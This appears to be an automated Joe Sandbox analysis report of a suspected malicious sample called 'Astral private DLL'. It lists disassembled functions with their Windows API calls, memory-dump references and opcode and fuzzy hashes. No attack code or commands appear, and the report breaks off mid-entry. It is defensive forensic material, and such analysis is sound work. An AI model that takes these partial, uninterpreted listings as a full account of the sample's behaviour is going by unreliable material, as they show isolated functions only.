                                                                • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,001A1098,001617CE,?,?,00000007,?,?,?,001613D6,?,00000000), ref: 00188EB1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocAllocate_free
                                                                • String ID:
                                                                • API String ID: 2447670028-0
                                                                • Opcode ID: 0139a5f23b66084a0888165dc3d72b84aee1656fda314303d5ae02e886686b07
                                                                • Instruction ID: 7e1f90a9d4e3ebd700483f8a52d4e999139dfec41a749fb6081cfcaeda45317e
                                                                • Opcode Fuzzy Hash: 0139a5f23b66084a0888165dc3d72b84aee1656fda314303d5ae02e886686b07
                                                                • Instruction Fuzzy Hash: 81F0F63221111266CB257A65AC05F6F37588FA1B70FE90126F814A6191DF70DF008FA0
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 001710AB
                                                                • GetProcessAffinityMask.KERNEL32(00000000), ref: 001710B2
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Process$AffinityCurrentMask
                                                                • String ID:
                                                                • API String ID: 1231390398-0
                                                                • Opcode ID: 41b69af1bf3b27ce475faeb530665a0ec1c11c7461dc26cbb6b1c3e697a61602
                                                                • Instruction ID: 986f93b5a31d163c206d22dd9ba169debd360e7cf1fef06a8452a3c9d56b47ae
                                                                • Opcode Fuzzy Hash: 41b69af1bf3b27ce475faeb530665a0ec1c11c7461dc26cbb6b1c3e697a61602
                                                                • Instruction Fuzzy Hash: 15E09232B00245BB8F198BA89C158EB72EDEA442043148176F417D3501FA30DE814660
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A501
                                                                  • Part of subcall function 0016BB03: _wcslen.LIBCMT ref: 0016BB27
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A532
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile$_wcslen
                                                                • String ID:
                                                                • API String ID: 2673547680-0
                                                                • Opcode ID: 09b1c7589107b49e706a5bc76b3b65200cbb4ef26e4947f69b9d704af87249b3
                                                                • Instruction ID: e3e7e227599ecc2281cc1c529650424a97197032dd4362f74f32f67ad10221cc
                                                                • Opcode Fuzzy Hash: 09b1c7589107b49e706a5bc76b3b65200cbb4ef26e4947f69b9d704af87249b3
                                                                • Instruction Fuzzy Hash: 60F065312401097BDF015F61DC45FDA37ACAF14385F488051B949E5160EB71DEE4DF50
                                                                APIs
                                                                • DeleteFileW.KERNELBASE(000000FF,?,?,0016977F,?,?,001695CF,?,?,?,?,?,00192641,000000FF), ref: 0016A1F1
                                                                  • Part of subcall function 0016BB03: _wcslen.LIBCMT ref: 0016BB27
                                                                • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0016977F,?,?,001695CF,?,?,?,?,?,00192641), ref: 0016A21F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: DeleteFile$_wcslen
                                                                • String ID:
                                                                • API String ID: 2643169976-0
                                                                • Opcode ID: 9dae799ba1bdc55808e5e0ed378db259237bb80e817d7cf8673adc8a20309856
                                                                • Instruction ID: f27d7f95f8efb42bafa4d0747d8af417cec80d077a04384eed76faad71cccec3
                                                                • Opcode Fuzzy Hash: 9dae799ba1bdc55808e5e0ed378db259237bb80e817d7cf8673adc8a20309856
                                                                • Instruction Fuzzy Hash: 00E0D8351402096BEB015F60DC46FD937ACAF1C3C5F488065B944E2050EB71DED4DE50
                                                                APIs
                                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00192641,000000FF), ref: 0017ACB0
                                                                • CoUninitialize.COMBASE(?,?,?,?,00192641,000000FF), ref: 0017ACB5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: GdiplusShutdownUninitialize
                                                                • String ID:
                                                                • API String ID: 3856339756-0
                                                                • Opcode ID: f44d7b0e5dd3043b8ebb6c1615291c5a24be3f336af02d79a90281e86e30647e
                                                                • Instruction ID: c9b4025fd4d79550c9519af5b2bd9962a22fd8cd0736367183b3067e25f7e4ac
                                                                • Opcode Fuzzy Hash: f44d7b0e5dd3043b8ebb6c1615291c5a24be3f336af02d79a90281e86e30647e
                                                                • Instruction Fuzzy Hash: B9E06D72604650EFCB019B58DC06B49FBE9FB89B20F04426AF416D3BA0CB74A840CA90
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,0016A23A,?,0016755C,?,?,?,?), ref: 0016A254
                                                                  • Part of subcall function 0016BB03: _wcslen.LIBCMT ref: 0016BB27
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0016A23A,?,0016755C,?,?,?,?), ref: 0016A280
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile$_wcslen
                                                                • String ID:
                                                                • API String ID: 2673547680-0
                                                                • Opcode ID: f5109fda6be84c21a28f9b0b1cf3cccc3804d888d3a68e90285e432e57c089f7
                                                                • Instruction ID: c52b0ae351948b69467737b5f621e18cd52b5bdc4f768a8f2d9626684a349043
                                                                • Opcode Fuzzy Hash: f5109fda6be84c21a28f9b0b1cf3cccc3804d888d3a68e90285e432e57c089f7
                                                                • Instruction Fuzzy Hash: B9E092355001245BCB21AB64CC05BD977A8AB183E1F044261FD54E31D0D770DE94CAA0
                                                                APIs
                                                                • _swprintf.LIBCMT ref: 0017DEEC
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                • SetDlgItemTextW.USER32(00000065,?), ref: 0017DF03
                                                                  • Part of subcall function 0017B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017B579
                                                                  • Part of subcall function 0017B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017B58A
                                                                  • Part of subcall function 0017B568: IsDialogMessageW.USER32(0001043C,?), ref: 0017B59E
                                                                  • Part of subcall function 0017B568: TranslateMessage.USER32(?), ref: 0017B5AC
                                                                  • Part of subcall function 0017B568: DispatchMessageW.USER32(?), ref: 0017B5B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                • String ID:
                                                                • API String ID: 2718869927-0
                                                                • Opcode ID: 5b296ee935542a4662fa11901ad533457dd387359e4bab58de6ae408b8cf26fd
                                                                • Instruction ID: 9b53ccc2d7d7e80ef43583cb744b60615e40c4510846c9ba9d5c550b0631b3a0
                                                                • Opcode Fuzzy Hash: 5b296ee935542a4662fa11901ad533457dd387359e4bab58de6ae408b8cf26fd
                                                                • Instruction Fuzzy Hash: B4E092B64042486ADF02AB74DC0AFDE3BAC5B19789F044851B204DA0A2EB78EA608671
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00170836
                                                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016F2D8,Crypt32.dll,00000000,0016F35C,?,?,0016F33E,?,?,?), ref: 00170858
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystem
                                                                • String ID:
                                                                • API String ID: 1175261203-0
                                                                • Opcode ID: 8f320117365626fc7458547d88f055a5082e4a1b51d30a2242ad7565df064754
                                                                • Instruction ID: 84003db0ac59429c9209660219cd0b7713b445a77e46705da6e6d7dab4207703
                                                                • Opcode Fuzzy Hash: 8f320117365626fc7458547d88f055a5082e4a1b51d30a2242ad7565df064754
                                                                • Instruction Fuzzy Hash: 05E048768001186BDB11A794DC49FDB77ACEF0D3D5F0440667649D2004D774DAC4CBB0
                                                                APIs
                                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0017A3DA
                                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0017A3E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: BitmapCreateFromGdipStream
                                                                • String ID:
                                                                • API String ID: 1918208029-0
                                                                • Opcode ID: 5535b410fb2955008ad3c7199f48ecb0e92de0bf3ea338c8af9ae6e41966ad34
                                                                • Instruction ID: 3ae68ec22290c07ed3e3dbeb5ed0d6e34e95acf378e168e5391022afb4c4f104
                                                                • Opcode Fuzzy Hash: 5535b410fb2955008ad3c7199f48ecb0e92de0bf3ea338c8af9ae6e41966ad34
                                                                • Instruction Fuzzy Hash: 9CE01271504218EFCB14DF95C541B9DBBF8FF18764F10C05AE84A93201E374AE04DB91
                                                                APIs
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00182BAA
                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00182BB5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                • String ID:
                                                                • API String ID: 1660781231-0
                                                                • Opcode ID: 166d718928f0d9c8e88961a797dc0ced6935fcc8e3840d563958a2a356ac3182
                                                                • Instruction ID: b758cd53f7de70f99a02ba4b6c2eb1794180835b379ce47d98d9ebdd056f12d5
                                                                • Opcode Fuzzy Hash: 166d718928f0d9c8e88961a797dc0ced6935fcc8e3840d563958a2a356ac3182
                                                                • Instruction Fuzzy Hash: 38D0A935156200188C2A7AB068029483385AF61BB27A0468BF831868C1EF318380AF12
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemShowWindow
                                                                • String ID:
                                                                • API String ID: 3351165006-0
                                                                • Opcode ID: ddcbf7b52f74f8b201892722ac09a24a408b5da2cf86bb1efb8ff93bd5663a61
                                                                • Instruction ID: 74605617df67db86ed7d3c14b281068dbb2fe7cbdca384abb02ed438a0ed8771
                                                                • Opcode Fuzzy Hash: ddcbf7b52f74f8b201892722ac09a24a408b5da2cf86bb1efb8ff93bd5663a61
                                                                • Instruction Fuzzy Hash: C2C0127205C200BECB011BB4DC09C2BBFB8EBA5312F08C908B0B5C0060C238C150EB11
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: dd9bbcb392190d770933c8f013702fcc7f0b365c94bdbf52e60ba092e48f48f7
                                                                • Instruction ID: 764941566fd18003c39826f0d94d9f44fe4b70eeae08ac7785f9e05231aaded4
                                                                • Opcode Fuzzy Hash: dd9bbcb392190d770933c8f013702fcc7f0b365c94bdbf52e60ba092e48f48f7
                                                                • Instruction Fuzzy Hash: B4C19230A00254BFEF19CF68CC98BAD7BB5AF15310F0C41B9EC569B296DB309964CB61
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: c605670703a976ecc7e4124e3853a9a6c9dea0a5cac51146280ea32879962ee3
                                                                • Instruction ID: 2da69316ffe3cc46d3853a454d770c325ec20b337c22afec4a730daed0bccdb6
                                                                • Opcode Fuzzy Hash: c605670703a976ecc7e4124e3853a9a6c9dea0a5cac51146280ea32879962ee3
                                                                • Instruction Fuzzy Hash: 8671D271500B449EDB25DB70CC559E7B7E9AF24301F40482EF6BB97242EB326AA4DF21
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00168289
                                                                  • Part of subcall function 001613DC: __EH_prolog.LIBCMT ref: 001613E1
                                                                  • Part of subcall function 0016A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0016A598
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog$CloseFind
                                                                • String ID:
                                                                • API String ID: 2506663941-0
                                                                • Opcode ID: 9a3611e977bfc7e7a1f1c8009cb4f4b2b23c374262eaf22afdb0050a31dd33c9
                                                                • Instruction ID: 12c8a05024c1ec25d587749096e8ee2c790ca964c859c7be1703c95f0b518754
                                                                • Opcode Fuzzy Hash: 9a3611e977bfc7e7a1f1c8009cb4f4b2b23c374262eaf22afdb0050a31dd33c9
                                                                • Instruction Fuzzy Hash: 5641D671944658AADB20DBA0CC55BEAB3B8BF14304F4405EBE08AA7183EF715FD8CB10
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 001613E1
                                                                  • Part of subcall function 00165E37: __EH_prolog.LIBCMT ref: 00165E3C
                                                                  • Part of subcall function 0016CE40: __EH_prolog.LIBCMT ref: 0016CE45
                                                                  • Part of subcall function 0016B505: __EH_prolog.LIBCMT ref: 0016B50A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: d2f00475033f80ddfcf80de4ccee2c11a24361b9d175233f2bb89839d760a8a1
                                                                • Instruction ID: b6e65f4c07f51590fe1d01e244badc59b20a025631f0a98312e909a8833a48da
                                                                • Opcode Fuzzy Hash: d2f00475033f80ddfcf80de4ccee2c11a24361b9d175233f2bb89839d760a8a1
                                                                • Instruction Fuzzy Hash: 7B4127B0905B409EE724DF798885AE6FAE5BF29300F54492ED5EF87282CB316654CB10
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 001613E1
                                                                  • Part of subcall function 00165E37: __EH_prolog.LIBCMT ref: 00165E3C
                                                                  • Part of subcall function 0016CE40: __EH_prolog.LIBCMT ref: 0016CE45
                                                                  • Part of subcall function 0016B505: __EH_prolog.LIBCMT ref: 0016B50A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: e4d3f7fba960e40dcb6c739a1b342fca34d49520a649c8b889e95133ba2cc49b
                                                                • Instruction ID: 62cbedd24e62e148230fb777e12d74dc2f15e9a9f9abe157d8008264238321e4
                                                                • Opcode Fuzzy Hash: e4d3f7fba960e40dcb6c739a1b342fca34d49520a649c8b889e95133ba2cc49b
                                                                • Instruction Fuzzy Hash: 634127B0905B409AE724DF798885AE6FAE5BF29300F54492ED5FE83282CB316654CB10
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0017B098
                                                                  • Part of subcall function 001613DC: __EH_prolog.LIBCMT ref: 001613E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 0d99bbb4db79a6d7b82e31afd80a575a806a5f32734cab14130f14636464651f
